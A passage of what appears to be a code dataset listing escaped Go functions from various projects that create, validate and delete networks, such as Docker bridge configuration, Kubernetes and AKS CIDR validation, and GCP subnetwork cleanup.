encap,\n\t\tSubnet: subnet,\n\t\tGateway: gw,\n\t\tPktTag: tag,\n\t}\n\terr := contivClient.NetworkPost(&net)\n\tif err != nil && !expError {\n\t\tt.Fatalf(\"Error creating network {%+v}. Err: %v\", net, err)\n\t} else if err == nil && expError {\n\t\tt.Fatalf(\"Create network {%+v} succeded while expecing error\", net)\n\t} else if err == nil {\n\t\t// verify network is created\n\t\t_, err := contivClient.NetworkGet(tenant, network)\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"Error getting network %s/%s. Err: %v\", tenant, network, err)\n\t\t}\n\t}\n}", "func (o *IpamNetworkDataData) GetNetworkIsValid() string {\n\tif o == nil || o.NetworkIsValid == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.NetworkIsValid\n}", "func (m *IPLBVrackNetworkVrackNetwork) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateSubnet(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateVrackNetworkID(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *NetworkPolicy) Validate() error {\n\treturn m.validate(false)\n}", "func (o *IpamNetworkDataData) GetNetworkIsValidOk() (*string, bool) {\n\tif o == nil || o.NetworkIsValid == nil {\n\t\treturn nil, false\n\t}\n\treturn o.NetworkIsValid, true\n}", "func ValidateNetworkStatus(spec *extensionsv1alpha1.NetworkStatus, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\treturn allErrs\n}", "func ValidateNetworkSpec(spec *extensionsv1alpha1.NetworkSpec, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tif len(spec.Type) == 0 {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"type\"), \"field is required\"))\n\t}\n\n\tvar cidrs []cidrvalidation.CIDR\n\n\tif len(spec.PodCIDR) == 0 {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"podCIDR\"), \"field is required\"))\n\t} else {\n\t\tcidrs = append(cidrs, cidrvalidation.NewCIDR(spec.PodCIDR, fldPath.Child(\"podCIDR\")))\n\t}\n\n\tif len(spec.ServiceCIDR) == 0 {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"serviceCIDR\"), \"field is required\"))\n\t} else {\n\t\tcidrs = append(cidrs, cidrvalidation.NewCIDR(spec.ServiceCIDR, fldPath.Child(\"serviceCIDR\")))\n\t}\n\n\tallErrs = append(allErrs, cidrvalidation.ValidateCIDRParse(cidrs...)...)\n\tallErrs = append(allErrs, cidrvalidation.ValidateCIDROverlap(cidrs, cidrs, false)...)\n\n\treturn allErrs\n}", "func (c *networkConfiguration) Validate() error {\n\tif c.Mtu < 0 {\n\t\treturn ErrInvalidMtu(c.Mtu)\n\t}\n\n\t// If bridge v4 subnet is specified\n\tif c.AddressIPv4 != nil {\n\t\t// If default gw is specified, it must be part of bridge subnet\n\t\tif c.DefaultGatewayIPv4 != nil {\n\t\t\tif !c.AddressIPv4.Contains(c.DefaultGatewayIPv4) {\n\t\t\t\treturn &ErrInvalidGateway{}\n\t\t\t}\n\t\t}\n\t}\n\n\t// If default v6 gw is specified, AddressIPv6 must be specified and gw must belong to AddressIPv6 subnet\n\tif c.EnableIPv6 && c.DefaultGatewayIPv6 != nil {\n\t\tif c.AddressIPv6 == nil || !c.AddressIPv6.Contains(c.DefaultGatewayIPv6) {\n\t\t\treturn &ErrInvalidGateway{}\n\t\t}\n\t}\n\treturn nil\n}", "func ValidateNetworks(Validations Validations, Service types.ServiceConfig) error {\n\tfor Network := range Service.Networks {\n\t\tif !goutil.StringInSlice(Network, Validations.Networks) {\n\t\t\treturn fmt.Errorf(\"Network '%s' not in the whitelist\", Network)\n\t\t}\n\t}\n\treturn nil\n}", "func (o *IpamNetworkDataData) HasNetworkIsValid() bool {\n\tif o != nil && o.NetworkIsValid != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m *PortNetworkPolicy) Validate() error {\n\treturn m.validate(false)\n}", "func (m *HttpNetworkPolicyRule) Validate() error {\n\treturn m.validate(false)\n}", "func (m *PortNetworkPolicyRule) Validate() error {\n\treturn m.validate(false)\n}", "func (n *Network) ValidateCreate() error {\n\tvar allErrors field.ErrorList\n\n\tnetworklog.Info(\"validate create\", \"name\", n.Name)\n\n\t// shared validation rules with update\n\tallErrors = append(allErrors, n.Validate()...)\n\n\tif len(allErrors) == 0 {\n\t\treturn nil\n\t}\n\n\treturn apierrors.NewInvalid(schema.GroupKind{}, n.Name, allErrors)\n}", "func NewNetwork(dockerClient *client.Client, cfg NetworkConfig) (out *Network, err error) {\n\tscopes.Framework.Infof(\"Creating Docker network %s\", cfg.Name)\n\tresp, err := dockerClient.NetworkCreate(context.Background(), cfg.Name, types.NetworkCreate{\n\t\tCheckDuplicate: true,\n\t\tLabels: cfg.Labels,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tscopes.Framework.Infof(\"Docker network %s created (ID=%s)\", cfg.Name, resp.ID)\n\n\tn := &Network{\n\t\tNetworkConfig: cfg,\n\t\tdockerClient: dockerClient,\n\t\tid: resp.ID,\n\t}\n\tdefer func() {\n\t\tif err != nil {\n\t\t\t_ = n.Close()\n\t\t}\n\t}()\n\n\t// Retrieve the subnet for the network.\n\tiresp, err := dockerClient.NetworkInspect(context.Background(), resp.ID, types.NetworkInspectOptions{})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif _, n.Subnet, err = net.ParseCIDR(iresp.IPAM.Config[0].Subnet); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn n, nil\n}", "func (e NetEvent) Validate() (bool, error) {\n\tif !e.isValidated {\n\t\tif e.NetDevice == \"\" {\n\t\t\treturn false, fmt.Errorf(\"source device for event not specified\")\n\t\t}\n\t}\n\treturn true, nil\n}", "func (m *KafkaNetworkPolicyRule) Validate() error {\n\treturn m.validate(false)\n}", "func (w *WithdrawalNetwork) Valid() bool {\n\tswitch *w {\n\tcase \"local\", \"remote\":\n\t\treturn true\n\tdefault:\n\t\treturn false\n\t}\n}", "func ParseNetwork(network string) (minIp uint32, maxIp uint32, err error) {\n\tip, subnet, err := net.ParseCIDR(network)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif ip = ip.To4(); ip == nil || ip[3] == 0 {\n\t\terr = fmt.Errorf(\"invalid network %s\", network)\n\t\treturn\n\t}\n\n\tminIp = Ipv4ToInt(subnet.IP) + 1\n\tmaxIp = minIp + ^Ipv4ToInt(net.IP(subnet.Mask)) - 1\n\n\treturn\n}", "func validateExternalNetwork(p *openstack.Platform, ci *CloudInfo, fldPath *field.Path) (allErrs field.ErrorList) {\n\t// Return an error if external network was specified in the install config, but hasn't been found\n\tif p.ExternalNetwork != \"\" && ci.ExternalNetwork == nil {\n\t\tallErrs = append(allErrs, field.NotFound(fldPath.Child(\"externalNetwork\"), p.ExternalNetwork))\n\t}\n\treturn allErrs\n}", "func Validate(name string, netType string, config map[string]string) error {\n\tdriverFunc, ok := drivers[netType]\n\tif !ok {\n\t\treturn ErrUnknownDriver\n\t}\n\n\tn := driverFunc()\n\tn.init(nil, 0, name, netType, \"\", config, \"Unknown\")\n\n\terr := n.ValidateName(name)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"Network name invalid\")\n\t}\n\n\treturn n.Validate(config)\n}", "func (ip IPNet) validate() error {\n\tif _, _, err := net.ParseCIDR(string(ip)); err != nil {\n\t\treturn fmt.Errorf(\"parse IPNet %s: %w\", string(ip), err)\n\t}\n\treturn nil\n}", "func (m *HttpNetworkPolicyRules) Validate() error {\n\treturn m.validate(false)\n}", "func (o *GetNetworkSharesOKBody) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := o.validateNetworkshareDetails(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func IsIPNetValid(nw *net.IPNet) bool {\n\treturn nw.String() != \"0.0.0.0/0\"\n}", "func (m *KafkaNetworkPolicyRules) Validate() error {\n\treturn m.validate(false)\n}", "func validateNetwork(h *host.Host, r command.Runner) string {\n\tip, err := h.Driver.GetIP()\n\tif err != nil {\n\t\texit.WithError(\"Unable to get VM IP address\", err)\n\t}\n\n\toptSeen := false\n\twarnedOnce := false\n\tfor _, k := range proxy.EnvVars {\n\t\tif v := os.Getenv(k); v != \"\" {\n\t\t\tif !optSeen {\n\t\t\t\tout.T(out.Internet, \"Found network options:\")\n\t\t\t\toptSeen = true\n\t\t\t}\n\t\t\tout.T(out.Option, \"{{.key}}={{.value}}\", out.V{\"key\": k, \"value\": v})\n\t\t\tipExcluded := proxy.IsIPExcluded(ip) // Skip warning if minikube ip is already in NO_PROXY\n\t\t\tk = strings.ToUpper(k) // for http_proxy & https_proxy\n\t\t\tif (k == \"HTTP_PROXY\" || k == \"HTTPS_PROXY\") && !ipExcluded && !warnedOnce {\n\t\t\t\tout.WarningT(\"You appear to be using a proxy, but your NO_PROXY environment does not include the minikube IP ({{.ip_address}}). Please see {{.documentation_url}} for more details\", out.V{\"ip_address\": ip, \"documentation_url\": \"https://minikube.sigs.k8s.io/docs/reference/networking/proxy/\"})\n\t\t\t\twarnedOnce = true\n\t\t\t}\n\t\t}\n\t}\n\n\tif !driver.BareMetal(h.Driver.DriverName()) && !driver.IsKIC(h.Driver.DriverName()) {\n\t\ttrySSH(h, ip)\n\t}\n\n\ttryLookup(r)\n\ttryRegistry(r)\n\treturn ip\n}", "func (m *PVMInstanceNetwork) ContextValidate(ctx context.Context, formats strfmt.Registry) error {\n\treturn nil\n}", "func (n *Network) ValidateUpdate(old runtime.Object) error {\n\tvar allErrors field.ErrorList\n\toldNetwork := old.(*Network)\n\n\tnetworklog.Info(\"validate update\", \"name\", n.Name)\n\n\t// shared validation rules with create\n\tallErrors = append(allErrors, n.Validate()...)\n\n\t// shared validation rules with create\n\tallErrors = append(allErrors, n.Spec.NetworkConfig.ValidateUpdate(&oldNetwork.Spec.NetworkConfig)...)\n\n\t// maximum allowed nodes with different name\n\tvar maxDiff int\n\t// all old nodes names\n\toldNodesNames := map[string]bool{}\n\t// nodes count in the old network spec\n\toldNodesCount := len(oldNetwork.Spec.Nodes)\n\t// nodes count in the new network spec\n\tnewNodesCount := len(n.Spec.Nodes)\n\t// nodes with different names than the old spec\n\tdifferentNodes := map[string]int{}\n\n\tif newNodesCount > oldNodesCount {\n\t\tmaxDiff = newNodesCount - oldNodesCount\n\t}\n\n\tfor _, node := range oldNetwork.Spec.Nodes {\n\t\toldNodesNames[node.Name] = true\n\t}\n\n\tfor i, node := range n.Spec.Nodes {\n\t\tif exists := oldNodesNames[node.Name]; !exists {\n\t\t\tdifferentNodes[node.Name] = i\n\t\t}\n\t}\n\n\tif len(differentNodes) > maxDiff {\n\t\tfor nodeName, i := range differentNodes {\n\t\t\terr := field.Invalid(field.NewPath(\"spec\").Child(\"nodes\").Index(i).Child(\"name\"), nodeName, \"field is immutable\")\n\t\t\tallErrors = append(allErrors, err)\n\t\t}\n\t}\n\n\tif len(allErrors) == 0 {\n\t\treturn nil\n\t}\n\n\treturn apierrors.NewInvalid(schema.GroupKind{}, n.Name, allErrors)\n\n}", "func (o *NetworkingProjectNetadpCreate) GetNetworkOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Network, true\n}", "func (m *AzureRMNetworkSecurityGroupConfiguration) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateSecurityRule(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (o *GetIPAMsubnetsParams) SetNetwork(network *string) {\n\to.Network = network\n}", "func (m *NetworkIP) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateIPAddress(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func ValidateNetworkGroupID(input interface{}, key string) (warnings []string, errors []error) {\n\tv, ok := input.(string)\n\tif !ok {\n\t\terrors = append(errors, fmt.Errorf(\"expected %q to be a string\", key))\n\t\treturn\n\t}\n\n\tif _, err := ParseNetworkGroupID(v); err != nil {\n\t\terrors = append(errors, err)\n\t}\n\n\treturn\n}", "func (n RequestDrivenWebServiceNetworkConfig) validate() error {\n\tif n.IsEmpty() {\n\t\treturn nil\n\t}\n\tif err := n.VPC.validate(); err != nil {\n\t\treturn fmt.Errorf(`validate \"vpc\": %w`, err)\n\t}\n\treturn nil\n}", "func (m *PVMInstanceV2NetworkPort) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateIPProtocol(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateType(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func checkDeleteNetwork(t *testing.T, expError bool, tenant, network string) {\n\terr := contivClient.NetworkDelete(tenant, network)\n\tif err != nil && !expError {\n\t\tt.Fatalf(\"Error deleting network %s/%s. Err: %v\", tenant, network, err)\n\t} else if err == nil && expError {\n\t\tt.Fatalf(\"Delete network %s/%s succeded while expecing error\", tenant, network)\n\t} else if err == nil {\n\t\t// verify network is gone\n\t\t_, err := contivClient.NetworkGet(tenant, network)\n\t\tif err == nil {\n\t\t\tt.Fatalf(\"Network %s/%s not deleted\", tenant, network)\n\t\t}\n\n\t\t// verify network state is gone too\n\t\tnetworkID := network + \".\" + tenant\n\t\tnwCfg := &mastercfg.CfgNetworkState{}\n\t\tnwCfg.StateDriver = stateStore\n\t\terr = nwCfg.Read(networkID)\n\t\tif err == nil {\n\t\t\tt.Fatalf(\"Network state %s not deleted\", networkID)\n\t\t}\n\t}\n}", "func (o *NetworkingProjectNetadpCreate) SetNetwork(v string) {\n\to.Network = v\n}", "func (n *Network) ValidateDelete() error {\n\tnetworklog.Info(\"validate delete\", \"name\", n.Name)\n\n\t// TODO(user): fill in your validation logic upon object deletion.\n\treturn nil\n}", "func (instance *Network) Create(ctx context.Context, req abstract.NetworkRequest) (xerr fail.Error) {\n\tdefer fail.OnPanic(&xerr)\n\n\tif instance == nil || instance.IsNull() {\n\t\treturn fail.InvalidInstanceError()\n\t}\n\tif ctx == nil {\n\t\treturn fail.InvalidParameterCannotBeNilError(\"ctx\")\n\t}\n\n\ttask, xerr := concurrency.TaskFromContext(ctx)\n\txerr = debug.InjectPlannedFail(xerr)\n\tif xerr != nil {\n\t\treturn xerr\n\t}\n\n\tif task.Aborted() {\n\t\treturn fail.AbortedError(nil, \"aborted\")\n\t}\n\n\ttracer := debug.NewTracer(task, true, \"('%s', '%s')\", req.Name, req.CIDR).WithStopwatch().Entering()\n\tdefer tracer.Exiting()\n\n\tinstance.lock.Lock()\n\tdefer instance.lock.Unlock()\n\n\t// Check if subnet already exists and is managed by SafeScale\n\tsvc := instance.GetService()\n\tif existing, xerr := LoadNetwork(svc, req.Name); xerr == nil {\n\t\texisting.Released()\n\t\treturn fail.DuplicateError(\"Network '%s' already exists\", req.Name)\n\t}\n\n\tif task.Aborted() {\n\t\treturn fail.AbortedError(nil, \"aborted\")\n\t}\n\n\t// Verify if the subnet already exist and in this case is not managed by SafeScale\n\t_, xerr = svc.InspectNetworkByName(req.Name)\n\txerr = debug.InjectPlannedFail(xerr)\n\tif xerr != nil {\n\t\tswitch xerr.(type) {\n\t\tcase *fail.ErrNotFound:\n\t\t\t// continue\n\t\tdefault:\n\t\t\treturn xerr\n\t\t}\n\t} else {\n\t\treturn fail.DuplicateError(\"Network '%s' already exists (not managed by SafeScale)\", req.Name)\n\t}\n\n\t// Verify the CIDR is not routable\n\tif req.CIDR != \"\" {\n\t\troutable, xerr := netretry.IsCIDRRoutable(req.CIDR)\n\t\txerr = debug.InjectPlannedFail(xerr)\n\t\tif xerr != nil {\n\t\t\treturn fail.Wrap(xerr, \"failed to determine if CIDR is not routable\")\n\t\t}\n\n\t\tif routable {\n\t\t\treturn fail.InvalidRequestError(\"cannot create such a Networking, CIDR must not be routable; please choose an appropriate CIDR (RFC1918)\")\n\t\t}\n\t}\n\n\tif task.Aborted() {\n\t\treturn fail.AbortedError(nil, \"aborted\")\n\t}\n\n\t// Create the Network\n\tlogrus.Debugf(\"Creating Network '%s' with CIDR '%s'...\", req.Name, req.CIDR)\n\tan, xerr := svc.CreateNetwork(req)\n\txerr = debug.InjectPlannedFail(xerr)\n\tif xerr != nil {\n\t\treturn xerr\n\t}\n\n\tdefer func() {\n\t\tif xerr != nil && !req.KeepOnFailure {\n\t\t\tderr := svc.DeleteNetwork(an.ID)\n\t\t\tderr = debug.InjectPlannedFail(derr)\n\t\t\tif derr != nil {\n\t\t\t\t_ = xerr.AddConsequence(fail.Wrap(derr, \"cleaning up on failure, failed to delete Network\"))\n\t\t\t}\n\t\t}\n\t}()\n\n\tif task.Aborted() {\n\t\treturn fail.AbortedError(nil, \"aborted\")\n\t}\n\n\t// Write subnet object metadata\n\t// logrus.Debugf(\"Saving subnet metadata '%s' ...\", subnet.GetName)\n\treturn instance.carry(an)\n}", "func NewNetwork(svc iaas.Service) (resources.Network, fail.Error) {\n\tif svc == nil {\n\t\treturn NullValue(), fail.InvalidParameterCannotBeNilError(\"svc\")\n\t}\n\n\tcoreInstance, xerr := NewCore(svc, networkKind, networksFolderName, &abstract.Network{})\n\txerr = debug.InjectPlannedFail(xerr)\n\tif xerr != nil {\n\t\treturn NullValue(), xerr\n\t}\n\n\tinstance := &Network{\n\t\tMetadataCore: coreInstance,\n\t}\n\treturn instance, nil\n}", "func NewNetwork(in, out, all []*NNode, netId int) *Network {\n\tn := Network{\n\t\tId: netId,\n\t\tinputs: in,\n\t\tOutputs: out,\n\t\tallNodes: all,\n\t\tnumLinks: -1,\n\t\tallNodesMIMO: all,\n\t}\n\treturn &n\n}", "func (d *driver) CreateNetwork(id string, option map[string]interface{}, nInfo driverapi.NetworkInfo, ipV4Data, ipV6Data []driverapi.IPAMData) error {\n\tif len(ipV4Data) == 0 || ipV4Data[0].Pool.String() == \"0.0.0.0/0\" {\n\t\treturn types.InvalidParameterErrorf(\"ipv4 pool is empty\")\n\t}\n\t// Sanity checks\n\td.Lock()\n\tif _, ok := d.networks[id]; ok {\n\t\td.Unlock()\n\t\treturn types.ForbiddenErrorf(\"network %s exists\", id)\n\t}\n\td.Unlock()\n\n\t// Parse and validate the config. It should not be conflict with existing networks' config\n\tconfig, err := parseNetworkOptions(id, option)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif err = config.processIPAM(id, ipV4Data, ipV6Data); err != nil {\n\t\treturn err\n\t}\n\n\t// start the critical section, from this point onward we are dealing with the list of networks\n\t// so to be consistent we cannot allow that the list changes\n\td.configNetwork.Lock()\n\tdefer d.configNetwork.Unlock()\n\n\t// check network conflicts\n\tif err = d.checkConflict(config); err != nil {\n\t\tnerr, ok := err.(defaultBridgeNetworkConflict)\n\t\tif !ok {\n\t\t\treturn err\n\t\t}\n\t\t// Got a conflict with a stale default network, clean that up and continue\n\t\tlog.G(context.TODO()).Warn(nerr)\n\t\tif err := d.deleteNetwork(nerr.ID); err != nil {\n\t\t\tlog.G(context.TODO()).WithError(err).Debug(\"Error while cleaning up network on conflict\")\n\t\t}\n\t}\n\n\t// there is no conflict, now create the network\n\tif err = d.createNetwork(config); err != nil {\n\t\treturn err\n\t}\n\n\treturn d.storeUpdate(config)\n}", "func (o *Transfer) SetNetwork(v TransferNetwork) {\n\to.Network = v\n}", "func NewNetwork(ctx *pulumi.Context,\n\tname string, args *NetworkArgs, opts ...pulumi.ResourceOpt) (*Network, error) {\n\tinputs := make(map[string]interface{})\n\tif args == nil {\n\t\tinputs[\"attachable\"] = nil\n\t\tinputs[\"checkDuplicate\"] = nil\n\t\tinputs[\"driver\"] = nil\n\t\tinputs[\"ingress\"] = nil\n\t\tinputs[\"internal\"] = nil\n\t\tinputs[\"ipamConfigs\"] = nil\n\t\tinputs[\"ipamDriver\"] = nil\n\t\tinputs[\"ipv6\"] = nil\n\t\tinputs[\"labels\"] = nil\n\t\tinputs[\"name\"] = nil\n\t\tinputs[\"options\"] = nil\n\t} else {\n\t\tinputs[\"attachable\"] = args.Attachable\n\t\tinputs[\"checkDuplicate\"] = args.CheckDuplicate\n\t\tinputs[\"driver\"] = args.Driver\n\t\tinputs[\"ingress\"] = args.Ingress\n\t\tinputs[\"internal\"] = args.Internal\n\t\tinputs[\"ipamConfigs\"] = args.IpamConfigs\n\t\tinputs[\"ipamDriver\"] = args.IpamDriver\n\t\tinputs[\"ipv6\"] = args.Ipv6\n\t\tinputs[\"labels\"] = args.Labels\n\t\tinputs[\"name\"] = args.Name\n\t\tinputs[\"options\"] = args.Options\n\t}\n\tinputs[\"scope\"] = nil\n\ts, err := ctx.RegisterResource(\"docker:index/network:Network\", name, true, inputs, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &Network{s: s}, nil\n}", "func (m *AzureManagedControlPlane) validateManagedClusterNetwork(cli client.Client) error {\n\tctx := context.Background()\n\n\t// Fetch the Cluster.\n\tclusterName, ok := m.Labels[clusterv1.ClusterNameLabel]\n\tif !ok {\n\t\treturn nil\n\t}\n\n\townerCluster := &clusterv1.Cluster{}\n\tkey := client.ObjectKey{\n\t\tNamespace: m.Namespace,\n\t\tName: clusterName,\n\t}\n\n\tif err := cli.Get(ctx, key, ownerCluster); err != nil {\n\t\treturn err\n\t}\n\n\tvar (\n\t\tallErrs field.ErrorList\n\t\tserviceCIDR string\n\t)\n\n\tif clusterNetwork := ownerCluster.Spec.ClusterNetwork; clusterNetwork != nil {\n\t\tif clusterNetwork.Services != nil {\n\t\t\t// A user may provide zero or one CIDR blocks. If they provide an empty array,\n\t\t\t// we ignore it and use the default. AKS doesn't support > 1 Service/Pod CIDR.\n\t\t\tif len(clusterNetwork.Services.CIDRBlocks) > 1 {\n\t\t\t\tallErrs = append(allErrs, field.TooMany(field.NewPath(\"Cluster\", \"Spec\", \"ClusterNetwork\", \"Services\", \"CIDRBlocks\"), len(clusterNetwork.Services.CIDRBlocks), 1))\n\t\t\t}\n\t\t\tif len(clusterNetwork.Services.CIDRBlocks) == 1 {\n\t\t\t\tserviceCIDR = clusterNetwork.Services.CIDRBlocks[0]\n\t\t\t}\n\t\t}\n\t\tif clusterNetwork.Pods != nil {\n\t\t\t// A user may provide zero or one CIDR blocks. If they provide an empty array,\n\t\t\t// we ignore it and use the default. AKS doesn't support > 1 Service/Pod CIDR.\n\t\t\tif len(clusterNetwork.Pods.CIDRBlocks) > 1 {\n\t\t\t\tallErrs = append(allErrs, field.TooMany(field.NewPath(\"Cluster\", \"Spec\", \"ClusterNetwork\", \"Pods\", \"CIDRBlocks\"), len(clusterNetwork.Pods.CIDRBlocks), 1))\n\t\t\t}\n\t\t}\n\t}\n\n\tif m.Spec.DNSServiceIP != nil {\n\t\tif serviceCIDR == \"\" {\n\t\t\tallErrs = append(allErrs, field.Required(field.NewPath(\"Cluster\", \"Spec\", \"ClusterNetwork\", \"Services\", \"CIDRBlocks\"), \"service CIDR must be specified if specifying DNSServiceIP\"))\n\t\t}\n\t\t_, cidr, err := net.ParseCIDR(serviceCIDR)\n\t\tif err != nil {\n\t\t\tallErrs = append(allErrs, field.Invalid(field.NewPath(\"Cluster\", \"Spec\", \"ClusterNetwork\", \"Services\", \"CIDRBlocks\"), serviceCIDR, fmt.Sprintf(\"failed to parse cluster service cidr: %v\", err)))\n\t\t}\n\n\t\tdnsIP := net.ParseIP(*m.Spec.DNSServiceIP)\n\t\tif dnsIP == nil { // dnsIP will be nil if the string is not a valid IP\n\t\t\tallErrs = append(allErrs, field.Invalid(field.NewPath(\"Spec\", \"DNSServiceIP\"), *m.Spec.DNSServiceIP, \"must be a valid IP address\"))\n\t\t}\n\n\t\tif dnsIP != nil && !cidr.Contains(dnsIP) {\n\t\t\tallErrs = append(allErrs, field.Invalid(field.NewPath(\"Cluster\", \"Spec\", \"ClusterNetwork\", \"Services\", \"CIDRBlocks\"), serviceCIDR, \"DNSServiceIP must reside within the associated cluster serviceCIDR\"))\n\t\t}\n\n\t\t// AKS only supports .10 as the last octet for the DNSServiceIP.\n\t\t// Refer to: https://learn.microsoft.com/en-us/azure/aks/configure-kubenet#create-an-aks-cluster-with-system-assigned-managed-identities\n\t\ttargetSuffix := \".10\"\n\t\tif dnsIP != nil && !strings.HasSuffix(dnsIP.String(), targetSuffix) {\n\t\t\tallErrs = append(allErrs, field.Invalid(field.NewPath(\"Spec\", \"DNSServiceIP\"), *m.Spec.DNSServiceIP, fmt.Sprintf(\"must end with %q\", targetSuffix)))\n\t\t}\n\t}\n\n\tif errs := validatePrivateEndpoints(m.Spec.VirtualNetwork.Subnet.PrivateEndpoints, []string{m.Spec.VirtualNetwork.Subnet.CIDRBlock}, field.NewPath(\"Spec\", \"VirtualNetwork.Subnet.PrivateEndpoints\")); len(errs) > 0 {\n\t\tallErrs = append(allErrs, errs...)\n\t}\n\n\tif len(allErrs) > 0 {\n\t\treturn kerrors.NewAggregate(allErrs.ToAggregate().Errors())\n\t}\n\treturn nil\n}", "func (s *Stack) DeleteNetwork(ref string) (err error) {\n\ttheNetwork, err := s.GetNetwork(ref)\n\tif err != nil {\n\t\tif gerr, ok := err.(*googleapi.Error); ok {\n\t\t\tif gerr.Code != 404 {\n\t\t\t\treturn err\n\t\t\t}\n\t\t} else {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tif theNetwork == nil {\n\t\treturn fail.Errorf(\n\t\t\tfmt.Sprintf(\"delete network failed: unexpected nil network when looking for [%s]\", ref), err,\n\t\t)\n\t}\n\n\tif !theNetwork.OK() {\n\t\tlogrus.Warnf(\"Missing data in network: %s\", spew.Sdump(theNetwork))\n\t}\n\n\tcompuService := s.ComputeService\n\tsubnetwork, err := compuService.Subnetworks.Get(s.GcpConfig.ProjectID, s.GcpConfig.Region, theNetwork.Name).Do()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\topp, err := compuService.Subnetworks.Delete(s.GcpConfig.ProjectID, s.GcpConfig.Region, subnetwork.Name).Do()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\toco := OpContext{\n\t\tOperation: opp,\n\t\tProjectID: s.GcpConfig.ProjectID,\n\t\tService: compuService,\n\t\tDesiredState: \"DONE\",\n\t}\n\n\terr = waitUntilOperationIsSuccessfulOrTimeout(oco, temporal.GetMinDelay(), temporal.GetHostCleanupTimeout())\n\tif err != nil {\n\t\tswitch err.(type) {\n\t\tcase fail.ErrTimeout:\n\t\t\tlogrus.Warnf(\"Timeout waiting for subnetwork deletion\")\n\t\t\treturn err\n\t\tdefault:\n\t\t\treturn err\n\t\t}\n\t}\n\n\t// Delete routes and firewall\n\tfirewallRuleName := fmt.Sprintf(\"%s-%s-all-in\", s.GcpConfig.NetworkName, subnetwork.Name)\n\tfws, err := compuService.Firewalls.Get(s.GcpConfig.ProjectID, firewallRuleName).Do()\n\tif fws != nil && err == nil {\n\t\topp, operr := compuService.Firewalls.Delete(s.GcpConfig.ProjectID, firewallRuleName).Do()\n\t\tif operr == nil {\n\t\t\toco := OpContext{\n\t\t\t\tOperation: opp,\n\t\t\t\tProjectID: s.GcpConfig.ProjectID,\n\t\t\t\tService: compuService,\n\t\t\t\tDesiredState: \"DONE\",\n\t\t\t}\n\n\t\t\toperr = waitUntilOperationIsSuccessfulOrTimeout(\n\t\t\t\toco, temporal.GetMinDelay(), temporal.GetHostCleanupTimeout(),\n\t\t\t)\n\t\t\tif operr != nil {\n\t\t\t\tlogrus.Warn(operr)\n\t\t\t}\n\t\t}\n\t}\n\tif err != nil {\n\t\tlogrus.Warn(err)\n\t}\n\n\tnatRuleName := fmt.Sprintf(\"%s-%s-nat-allowed\", s.GcpConfig.NetworkName, subnetwork.Name)\n\tnws, err := compuService.Routes.Get(s.GcpConfig.ProjectID, natRuleName).Do()\n\tif nws != nil && err == nil {\n\t\topp, operr := compuService.Routes.Delete(s.GcpConfig.ProjectID, natRuleName).Do()\n\t\tif operr == nil {\n\t\t\toco := OpContext{\n\t\t\t\tOperation: opp,\n\t\t\t\tProjectID: s.GcpConfig.ProjectID,\n\t\t\t\tService: compuService,\n\t\t\t\tDesiredState: \"DONE\",\n\t\t\t}\n\n\t\t\toperr = waitUntilOperationIsSuccessfulOrTimeout(\n\t\t\t\toco, temporal.GetMinDelay(), temporal.GetHostCleanupTimeout(),\n\t\t\t)\n\t\t\tif operr != nil {\n\t\t\t\tlogrus.Warn(operr)\n\t\t\t}\n\t\t}\n\t}\n\tif err != nil {\n\t\tlogrus.Warn(err)\n\t}\n\n\treturn nil\n}", "func (n *Network) ValidateNodes() field.ErrorList {\n\tvar allErrors field.ErrorList\n\n\tfor i := range n.Spec.Nodes {\n\t\tpath := field.NewPath(\"spec\").Child(\"nodes\").Index(i)\n\t\tnode := Node{\n\t\t\tSpec: n.Spec.Nodes[i].NodeSpec,\n\t\t}\n\t\t// No need to pass network and availability config\n\t\t// it has already been passed during network defaulting phase\n\t\t// no need to validate network config\n\t\tallErrors = append(allErrors, node.Validate(path, false)...)\n\t}\n\n\tif err := n.ValidateMissingBootnodes(); err != nil {\n\t\tallErrors = append(allErrors, err)\n\t}\n\n\treturn allErrors\n}", "func ValidateNoDuplicateNetworkRules(attribute string, rules []*NetworkRule) error {\n\n\ttype indexedRule 